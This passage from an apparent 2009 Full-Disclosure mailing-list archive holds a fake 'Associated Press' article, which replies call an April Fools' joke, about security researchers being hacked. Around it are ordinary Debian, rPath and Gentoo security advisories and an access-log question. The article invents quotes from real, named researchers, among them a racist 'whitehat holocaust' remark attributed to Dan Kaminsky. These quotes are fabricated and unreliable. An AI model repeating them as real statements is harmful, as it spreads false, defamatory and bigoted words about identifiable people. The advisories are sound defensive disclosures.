Petkov, and Dragos Ruiu. They pooled their resources to analyse just
how thoroughly they have been compromised. In an email response, Billy
K. Rios informed us that "pdp did some polling around the community.
Dragos wrote some scripts that did a lot of heavy analysis on our
machines and Nate was really good at distributing them and getting
results. Dan was all over the place, without him we wouldn't have
these graphs. And of course we all chipped in on the blogging."

According to Kaminsky, between the group of them, they have a
"shitload" of compromised files. "But it isn't just us," he continued,
"security researchers everywhere are at risk. We're some of the very
best at what we do, and even we cannot mitigrate all risk factors to
eliminate the potential for damage. My less experienced
contemporaries, like Halvar Flake, are really in no position to defend
themselves." As far as Dan could tell, "most of [the collaborating
team]" have been hacked in the past year. "This means that the average
security researcher has probably been hacked." Dan explained that the
Chinese are probably to blame, because of the forensic evidence
pointing in that direction. "These IPs are often Chinese. This is war,
war on the white man. It's like the Jewish holocaust, just it's a
whitehat holocaust."

If you are a prominent security researcher, what can you do help
yourself? Right now, not much, according to Kaminsky. "At my talk at
the Blackhat Briefings this summer I will explain how to subvert this
risk. Until then, the whitehats of the world need to talk to IOActive
about investing in their Comprehensive Computer Security Services."

When elaborating on the extent of damages that could be caused by
hackers, Dan explained that "they could make modifications to our
websites and could even write PHP code that would steal your password
when you log in and then send it back to a remote server of theirs.
This is why the use of secure salted asymmetric crytographic hashes is
important. That's an area that, based on our review of our machines,
is occasionally under-utilised. Hackers can do a lot more than just
steal our identities or purchase comic books on ebay with our credit
cards. They could scan our databases and use our resources to send
viruses, or use our websites as trusted sites to trick you into
downloading a virus. If you wait for my Blackhat talk, I will be
explaining these risks in full."

Billy K. Rios provided us with more details on how they became
interested in such innovative research areas. "We've been actively
monitoring and researching a number of hacker communication channels,
like the Full-Disclosure mailing list and some Internet Relay Chat
rooms. We've been watching packets, and those are always interesting.
Shiny, too. Between us, we pretty much hear everything. Due to our
diligent observations, we noticed some of our spools and passwords
have been shared amongst underground hackers. It seems some of root
passes were even traded for accounts on private torrent sites."

Real hackers were unavailable for comment.



From rlemos53 at gmail.com  Fri Apr  3 00:01:29 2009
From: rlemos53 at gmail.com (Robert Lemos)
Date: Thu, 2 Apr 2009 19:01:29 -0400
Subject: [Full-disclosure] Security Research Suggests Security
	Researchers Owned
In-Reply-To: <2d792fb20904021600h2d1763a7i33cf06faa7e6095b@mail.gmail.com>
References: <e02cffd50904021551v5a7b2054u2b2cb5598662f1af@mail.gmail.com>
	<2d792fb20904021600h2d1763a7i33cf06faa7e6095b@mail.gmail.com>
Message-ID: <e02cffd50904021601sdda9585xb9bcd84ced5c9296@mail.gmail.com>

April Fools' Day is for jokes.

On 4/2/09, Razi Shaban <razishaban at gmail.com> wrote:
> April fools was two days ago
>
> On 4/3/09, Robert Lemos <rlemos53 at gmail.com> wrote:
>> Security Research Suggests Security Researchers Owned
>>
>> Associated Press
>>
>> A high percentage of active security researchers have been hacked, and
>> have their shit "pwnt", according to recent research by a
>> collaboration of security researchers. Malicious hackers, possibly
>> from China, are considered responsible for most cases. "It really goes
>> beyond just having our files compromised," security researcher Dan
>> Kaminsky told us, "they have our passwords, our nudes, our Instant
>> Messages, our e-mails, our Social Security Numbers, our addresses and
>> phone numbers, our financial and business information, our website
>> source codes, our girlfriends and our shoe sizes. These people have
>> everything, they really have total control over our lives."
>>
>> Dan Kaminsky led a research team that included notable insecure
>> researchers Christien Rioux, Nate McFeters, Billy K. Rios, Petko D.
>> Petkov, and Dragos Ruiu. They pooled their resources to analyse just
>> how thoroughly they have been compromised. In an email response, Billy
>> K. Rios informed us that "pdp did some polling around the community.
>> Dragos wrote some scripts that did a lot of heavy analysis on our
>> machines and Nate was really good at distributing them and getting
>> results. Dan was all over the place, without him we wouldn't have
>> these graphs. And of course we all chipped in on the blogging."
>>
>> According to Kaminsky, between the group of them, they have a
>> "shitload" of compromised files. "But it isn't just us," he continued,
>> "security researchers everywhere are at risk. We're some of the very
>> best at what we do, and even we cannot mitigrate all risk factors to
>> eliminate the potential for damage. My less experienced
>> contemporaries, like Halvar Flake, are really in no position to defend
>> themselves." As far as Dan could tell, "most of [the collaborating
>> team]" have been hacked in the past year. "This means that the average
>> security researcher has probably been hacked." Dan explained that the
>> Chinese are probably to blame, because of the forensic evidence
>> pointing in that direction. "These IPs are often Chinese. This is war,
>> war on the white man. It's like the Jewish holocaust, just it's a
>> whitehat holocaust."
>>
>> If you are a prominent security researcher, what can you do help
>> yourself? Right now, not much, according to Kaminsky. "At my talk at
>> the Blackhat Briefings this summer I will explain how to subvert this
>> risk. Until then, the whitehats of the world need to talk to IOActive
>> about investing in their Comprehensive Computer Security Services."
>>
>> When elaborating on the extent of damages that could be caused by
>> hackers, Dan explained that "they could make modifications to our
>> websites and could even write PHP code that would steal your password
>> when you log in and then send it back to a remote server of theirs.
>> This is why the use of secure salted asymmetric crytographic hashes is
>> important. That's an area that, based on our review of our machines,
>> is occasionally under-utilised. Hackers can do a lot more than just
>> steal our identities or purchase comic books on ebay with our credit
>> cards. They could scan our databases and use our resources to send
>> viruses, or use our websites as trusted sites to trick you into
>> downloading a virus. If you wait for my Blackhat talk, I will be
>> explaining these risks in full."
>>
>> Billy K. Rios provided us with more details on how they became
>> interested in such innovative research areas. "We've been actively
>> monitoring and researching a number of hacker communication channels,
>> like the Full-Disclosure mailing list and some Internet Relay Chat
>> rooms. We've been watching packets, and those are always interesting.
>> Shiny, too. Between us, we pretty much hear everything. Due to our
>> diligent observations, we noticed some of our spools and passwords
>> have been shared amongst underground hackers. It seems some of root
>> passes were even traded for accounts on private torrent sites."
>>
>> Real hackers were unavailable for comment.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>



From razishaban at gmail.com  Fri Apr  3 00:00:16 2009
From: razishaban at gmail.com (Razi Shaban)
Date: Fri, 3 Apr 2009 02:00:16 +0300
Subject: [Full-disclosure] Security Research Suggests Security
	Researchers Owned
In-Reply-To: <e02cffd50904021551v5a7b2054u2b2cb5598662f1af@mail.gmail.com>
References: <e02cffd50904021551v5a7b2054u2b2cb5598662f1af@mail.gmail.com>
Message-ID: <2d792fb20904021600h2d1763a7i33cf06faa7e6095b@mail.gmail.com>

April fools was two days ago

On 4/3/09, Robert Lemos <rlemos53 at gmail.com> wrote:
> Security Research Suggests Security Researchers Owned
>
> Associated Press
>
> A high percentage of active security researchers have been hacked, and
> have their shit "pwnt", according to recent research by a
> collaboration of security researchers. Malicious hackers, possibly
> from China, are considered responsible for most cases. "It really goes
> beyond just having our files compromised," security researcher Dan
> Kaminsky told us, "they have our passwords, our nudes, our Instant
> Messages, our e-mails, our Social Security Numbers, our addresses and
> phone numbers, our financial and business information, our website
> source codes, our girlfriends and our shoe sizes. These people have
> everything, they really have total control over our lives."
>
> Dan Kaminsky led a research team that included notable insecure
> researchers Christien Rioux, Nate McFeters, Billy K. Rios, Petko D.
> Petkov, and Dragos Ruiu. They pooled their resources to analyse just
> how thoroughly they have been compromised. In an email response, Billy
> K. Rios informed us that "pdp did some polling around the community.
> Dragos wrote some scripts that did a lot of heavy analysis on our
> machines and Nate was really good at distributing them and getting
> results. Dan was all over the place, without him we wouldn't have
> these graphs. And of course we all chipped in on the blogging."
>
> According to Kaminsky, between the group of them, they have a
> "shitload" of compromised files. "But it isn't just us," he continued,
> "security researchers everywhere are at risk. We're some of the very
> best at what we do, and even we cannot mitigrate all risk factors to
> eliminate the potential for damage. My less experienced
> contemporaries, like Halvar Flake, are really in no position to defend
> themselves." As far as Dan could tell, "most of [the collaborating
> team]" have been hacked in the past year. "This means that the average
> security researcher has probably been hacked." Dan explained that the
> Chinese are probably to blame, because of the forensic evidence
> pointing in that direction. "These IPs are often Chinese. This is war,
> war on the white man. It's like the Jewish holocaust, just it's a
> whitehat holocaust."
>
> If you are a prominent security researcher, what can you do help
> yourself? Right now, not much, according to Kaminsky. "At my talk at
> the Blackhat Briefings this summer I will explain how to subvert this
> risk. Until then, the whitehats of the world need to talk to IOActive
> about investing in their Comprehensive Computer Security Services."
>
> When elaborating on the extent of damages that could be caused by
> hackers, Dan explained that "they could make modifications to our
> websites and could even write PHP code that would steal your password
> when you log in and then send it back to a remote server of theirs.
> This is why the use of secure salted asymmetric crytographic hashes is
> important. That's an area that, based on our review of our machines,
> is occasionally under-utilised. Hackers can do a lot more than just
> steal our identities or purchase comic books on ebay with our credit
> cards. They could scan our databases and use our resources to send
> viruses, or use our websites as trusted sites to trick you into
> downloading a virus. If you wait for my Blackhat talk, I will be
> explaining these risks in full."
>
> Billy K. Rios provided us with more details on how they became
> interested in such innovative research areas. "We've been actively
> monitoring and researching a number of hacker communication channels,
> like the Full-Disclosure mailing list and some Internet Relay Chat
> rooms. We've been watching packets, and those are always interesting.
> Shiny, too. Between us, we pretty much hear everything. Due to our
> diligent observations, we noticed some of our spools and passwords
> have been shared amongst underground hackers. It seems some of root
> passes were even traded for accounts on private torrent sites."
>
> Real hackers were unavailable for comment.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From white at debian.org  Thu Apr  2 14:41:03 2009
From: white at debian.org (Steffen Joeris)
Date: Fri,  3 Apr 2009 00:41:03 +1100 (EST)
Subject: [Full-disclosure] [SECURITY] [DSA 1762-1] New icu packages fix
	cross site scripting
Message-ID: <20090402134103.6B15FAB0013@hannah.localdomain>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1762-1                  security at debian.org
http://www.debian.org/security/                      Steffen Joeris
April 02, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : icu
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id         : CVE-2008-1036


It was discovered that icu, the internal components for Unicode, did
not properly sanitise invalid encoded data, which could lead to cross-
site scripting attacks.


For the stable distribution (lenny), this problem has been fixed in
version 3.8.1-3+lenny1.

For the oldstable distribution (etch), this problem has been fixed in
version 3.6-2etch2.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 4.0.1-1.


We recommend that you upgrade your icu packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch2.diff.gz
    Size/MD5 checksum:    14912 d15e89ba186f4003cf0fe25523bf5b68
  http://security.debian.org/pool/updates/main/i/icu/icu_3.6-2etch2.dsc
    Size/MD5 checksum:      600 be64e9d5a346866e9cb5c0f60243d2fe
  http://security.debian.org/pool/updates/main/i/icu/icu_3.6.orig.tar.gz
    Size/MD5 checksum:  9778863 0f1bda1992b4adca62da68a7ad79d830

Architecture independent packages:

  http://security.debian.org/pool/updates/main/i/icu/icu-doc_3.6-2etch2_all.deb
    Size/MD5 checksum:  3334030 c6e6fbd348c8d802746a890393a767a5

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_alpha.deb
    Size/MD5 checksum:  5584350 c988d1810f2abe6aca3c530061343674
  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_alpha.deb
    Size/MD5 checksum:  7009562 489c1341f1331b8664ec201d7b0896ac

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_amd64.deb
    Size/MD5 checksum:  5444828 4cf4fecae90466c879a1b506da4b54da
  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_amd64.deb
    Size/MD5 checksum:  6584058 b74be6476a73b13f397c742dd05a46ef

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_arm.deb
    Size/MD5 checksum:  5455872 ffd9a4362bd56c95ac8c9e2d59b0f85b
  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_arm.deb
    Size/MD5 checksum:  6625136 a64d8a5965f960b7a42f175465552d1b

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_i386.deb
    Size/MD5 checksum:  6480730 bab51b594e5b159ec97c4d0a78e137d4
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_i386.deb
    Size/MD5 checksum:  5464844 6022ce1a314dc2ac9ba6a4e7c2364c0f

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_ia64.deb
    Size/MD5 checksum:  7240032 54c98bff14b4d4b9106cbe4a0f37a790
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_ia64.deb
    Size/MD5 checksum:  5865936 dfe2b9a21d02b3f6d0328076e90884b9

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_mips.deb
    Size/MD5 checksum:  5747772 6f7e94aa52df7e55632aded82da5be5b
  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_mips.deb
    Size/MD5 checksum:  7032276 c873f62a11e599880d349171be6724b7

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_mipsel.deb
    Size/MD5 checksum:  6767430 c34cfe617b2fa3b0ac265f445a77b151
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_mipsel.deb
    Size/MD5 checksum:  5462642 42cec53922ec7b565c314daca3480331

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_powerpc.deb
    Size/MD5 checksum:  6889534 dbbcea68da2b4cde02734cf8af6a8bdd
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_powerpc.deb
    Size/MD5 checksum:  5748424 4af92234d22b585cdce7912733bc309e

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_s390.deb
    Size/MD5 checksum:  6895200 637a01ea921657380bd42959e4bd5adf
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_s390.deb
    Size/MD5 checksum:  5777440 b1be81050b86652f9c1d943bc4887dc7

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/i/icu/libicu36-dev_3.6-2etch2_sparc.deb
    Size/MD5 checksum:  6772296 b0bb6f8d327193d0e9055e8eb8f98a51
  http://security.debian.org/pool/updates/main/i/icu/libicu36_3.6-2etch2_sparc.deb
    Size/MD5 checksum:  5671528 fa33dfa1c2278405708d23cd94be6919


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1-3+lenny1.dsc
    Size/MD5 checksum:     1297 daaf6d8629a5cde19dcfed98bc9a84a9
  http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1.orig.tar.gz
    Size/MD5 checksum: 10591204 ca52a1eb5050478f5f7d24e16ce01f57
  http://security.debian.org/pool/updates/main/i/icu/icu_3.8.1-3+lenny1.diff.gz
    Size/MD5 checksum:    20267 9c9d1d71c50f4deec44e95a9d5ea2530

Architecture independent packages:

  http://security.debian.org/pool/updates/main/i/icu/icu-doc_3.8.1-3+lenny1_all.deb
    Size/MD5 checksum:  3774790 1a1cd3c7fde641350322461af9f57a37

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_alpha.deb
    Size/MD5 checksum:  7565948 02e495e8771842e904cf67a80de61b82
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_alpha.deb
    Size/MD5 checksum:  6065532 de58265aad775defadbb2a7b6af9d88d
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_alpha.deb
    Size/MD5 checksum:  2364976 a28a051462a4b40c1ca94b663145ce16

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/i/icu/lib32icu-dev_3.8.1-3+lenny1_amd64.deb
    Size/MD5 checksum:  6062920 3a90fc0d97f43436e4cca417a662b0f8
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_amd64.deb
    Size/MD5 checksum:  7131010 c7bcc67bf7ebc77254f2b5b9f312f1bb
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_amd64.deb
    Size/MD5 checksum:  2401370 d54929d018b9c28224299bad4b3fd3a7
  http://security.debian.org/pool/updates/main/i/icu/lib32icu38_3.8.1-3+lenny1_amd64.deb
    Size/MD5 checksum:  5920040 bfbb1dd39f462c2737a114f40fc3b494
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_amd64.deb
    Size/MD5 checksum:  5932356 bcf6d7dab8a71f00e702384b97cf19a4

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_arm.deb
    Size/MD5 checksum:  2286786 ce4bb8567f48cc3cf235368db8963544
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_arm.deb
    Size/MD5 checksum:  7183924 fbc8204644ef5e0fc74fc22f7d26034a
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_arm.deb
    Size/MD5 checksum:  5907872 93989d0a25c86c9e38e6317ca420fbc4

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_armel.deb
    Size/MD5 checksum:  1755700 89f87c26a0ce9a7f923a05d9b2555673
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_armel.deb
    Size/MD5 checksum:  7411842 70fc597eeb9c0e9e68d0137e0216f124
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_armel.deb
    Size/MD5 checksum:  5847710 08c26011ddb182edb57549e671d6cc61

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_hppa.deb
    Size/MD5 checksum:  6377564 b8b8b1a62a0a02dd8469f7c172d92415
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_hppa.deb
    Size/MD5 checksum:  7663982 cae24c749162aa3f4a896ec5dbde678a
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_hppa.deb
    Size/MD5 checksum:  2357154 3ba097e27ead38178bbb8f804f13d77a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_i386.deb
    Size/MD5 checksum:  2278828 f9111677c4e7b9244bd643d748e2f18c
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_i386.deb
    Size/MD5 checksum:  5920016 7aecb5bc8fe15f0c1b5ef5c4419eab6a
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_i386.deb
    Size/MD5 checksum:  6991888 351e9f8d60f139c335bf7ea07235dc08

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_ia64.deb
    Size/MD5 checksum:  6396240 7c56b1d5f54c9f6a4a2a6fc9698e4337
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_ia64.deb
    Size/MD5 checksum:  7825392 c99733de07fe43de5c0c1d923ebf93aa
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_ia64.deb
    Size/MD5 checksum:  2207992 757e5e5c49c66411cc7e1077808c7576

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_mips.deb
    Size/MD5 checksum:  7599142 1d81608602f7b3a18dc8e3d03bf603ff
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_mips.deb
    Size/MD5 checksum:  6207630 d7bd482f6030f1ae4ff75c4735947b08
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_mips.deb
    Size/MD5 checksum:  2472538 2f7b6f0c8a5dfa6ce877b8305a6779b0

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_mipsel.deb
    Size/MD5 checksum:  2405182 59d89f0a9a81429ec02f87debcb8e6a3
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_mipsel.deb
    Size/MD5 checksum:  5898892 94257031e244b5b52e9cbe8e37bb1f30
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_mipsel.deb
    Size/MD5 checksum:  7293408 f70b0c75989a5983f6921ee323b99c3c

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_powerpc.deb
    Size/MD5 checksum:  6290800 bae34e705b5213d14a638350398a7d29
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_powerpc.deb
    Size/MD5 checksum:  7460598 8edd0cb02d62dfc5ce69c872e413ca39
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_powerpc.deb
    Size/MD5 checksum:  2376240 00fc0ad10f85fded7380fcaaccbe1514

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_s390.deb
    Size/MD5 checksum:  7434356 de117fb929327d908c11ede36daa9166
  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_s390.deb
    Size/MD5 checksum:  6269494 a17ae098f688e8a14bc79854013cada4
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_s390.deb
    Size/MD5 checksum:  2468406 d57fdf831571e1147f213051a50f8fdd

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/i/icu/libicu38_3.8.1-3+lenny1_sparc.deb
    Size/MD5 checksum:  6144646 e12966bb72793d7e6220eafd5ddb0c88
  http://security.debian.org/pool/updates/main/i/icu/libicu38-dbg_3.8.1-3+lenny1_sparc.deb
    Size/MD5 checksum:  2133070 454335db0966dc15c78261ef1a8fdcfc
  http://security.debian.org/pool/updates/main/i/icu/libicu-dev_3.8.1-3+lenny1_sparc.deb
    Size/MD5 checksum:  7302732 432d9fdee1502bf363d1db33ee6519ab


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAknUvVEACgkQ62zWxYk/rQdThwCePQlHdG3uednXCExAwDUkG/wm
pvQAn20Sklo2kbg8oQWMfCF2NOLJnw1M
=yQp0
-----END PGP SIGNATURE-----



From tonu at jes.ee  Thu Apr  2 16:53:00 2009
From: tonu at jes.ee (Tonu Samuel)
Date: Thu, 02 Apr 2009 18:53:00 +0300
Subject: [Full-disclosure] Random HTTP-Requests
In-Reply-To: <c9a09d00903310837h76b3f0a8rde8f5c03e5f6dbd7@mail.gmail.com>
References: <c9a09d00903310730u369ce80are89b486c116dd6d4@mail.gmail.com>
	<cdfaf8b20903310756t171e106asf9b44cdafdda6365@mail.gmail.com>
	<c9a09d00903310837h76b3f0a8rde8f5c03e5f6dbd7@mail.gmail.com>
Message-ID: <1238687580.31619.2.camel@tonu-laptop>

> he corresponding request in the access log was a good idea..
> 
> Here's one example:
> 221.204.*.* - - [30/Mar/2009:10:21:30 +0200] "GET
> /mtERuE0/osOAJo/3dK/tUekE2Ws.gif HTTP/1.1" 404 293 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Google for 221.204.x.x. You more weird things from this place people
complain about in internet.

   T?nu



From announce-noreply at rpath.com  Fri Apr  3 06:38:42 2009
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 03 Apr 2009 01:38:42 -0400
Subject: [Full-disclosure] rPSA-2009-0057-1 m2crypto openssl openssl-scripts
Message-ID: <49d5a0e2.aibXlzT3fNsB5DIm%announce-noreply@rpath.com>

rPath Security Advisory: 2009-0057-1
Published: 2009-04-03
Products:
    rPath Appliance Platform Linux Service 1
    rPath Appliance Platform Linux Service 2
    rPath Linux 1
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Indirect Deterministic Denial of Service
Updated Versions:
    m2crypto=conary.rpath.com at rpl:2/0.18-1-0.2
    openssl=conary.rpath.com at rpl:1/0.9.7f-10.16-1[krb]
    openssl=conary.rpath.com at rpl:2/0.9.8g-7.2-1
    openssl-scripts=conary.rpath.com at rpl:1/0.9.7f-10.13-1[krb]
    openssl-scripts=conary.rpath.com at rpl:2/0.9.8g-7.2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2994
    https://issues.rpath.com/browse/RPL-2997

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590
    http://www.openssl.org/news/secadv_20090325.txt

Description:
    Previous versions of OpenSSL were vulnerable to denial of
    service (crash) that could be caused when SSL enabled
    applications called the ASN1_STRING_print_ex function to print
    a BMPString or UniversalString.
    
    Additionally, previous versions of the OpenSSL package in rPath
    Linux 2 did not provide a unique shared object version compared
    to rPath Linux 1.  The m2crypto package has been rebuilt
    to depend on this new shared object version.  In certain unusual
    cases, updating from an operating system or software
    appliance based on rPath Linux 1 to a version based on
    rPath Linux 2 could fail the update.  Specifically, this would
    happen if the rPath Appliance Platform Agent was added to the
    list of critical updates. 

http://wiki.rpath.com/Advisories:rPSA-2009-0057

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From rbu at gentoo.org  Fri Apr  3 14:48:30 2009
From: rbu at gentoo.org (Robert Buchholz)
Date: Fri, 3 Apr 2009 15:48:30 +0200
Subject: [Full-disclosure] [ GLSA 200904-03 ] Gnumeric: Untrusted search path
Message-ID: <200904031548.34764.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Gnumeric: Untrusted search path
      Date: April 03, 2009
      Bugs: #257012
        ID: 200904-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An untrusted search path vulnerability in Gnumeric might result in the
execution of arbitrary code.

Background
==========

The Gnumeric spreadsheet is a versatile application developed as part
of the GNOME Office project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  app-office/gnumeric     < 1.8.4-r1                    >= 1.8.4-r1

Description
===========

James Vega reported an untrusted search path vulnerability in the
GObject Python interpreter wrapper in Gnumeric.

Impact
======

A local attacker could entice a user to run Gnumeric from a directory
containing a specially crafted python module, resulting in the
execution of arbitrary code with the privileges of the user running
Gnumeric.

Workaround
==========

Do not run "gnumeric" from untrusted working directories.

Resolution
==========

All Gnumeric users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/gnumeric-1.8.4-r1"

References
==========

  [ 1 ] CVE-2009-0318
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0318

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090403/3b022c75/attachment.bin 

From rbu at gentoo.org  Fri Apr  3 14:47:56 2009
From: rbu at gentoo.org (Robert Buchholz)
Date: Fri, 3 Apr 2009 15:47:56 +0200
Subject: [Full-disclosure] [ GLSA 200904-02 ] GLib: Execution of arbitrary
	code
Message-ID: <200904031547.59921.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GLib: Execution of arbitrary code
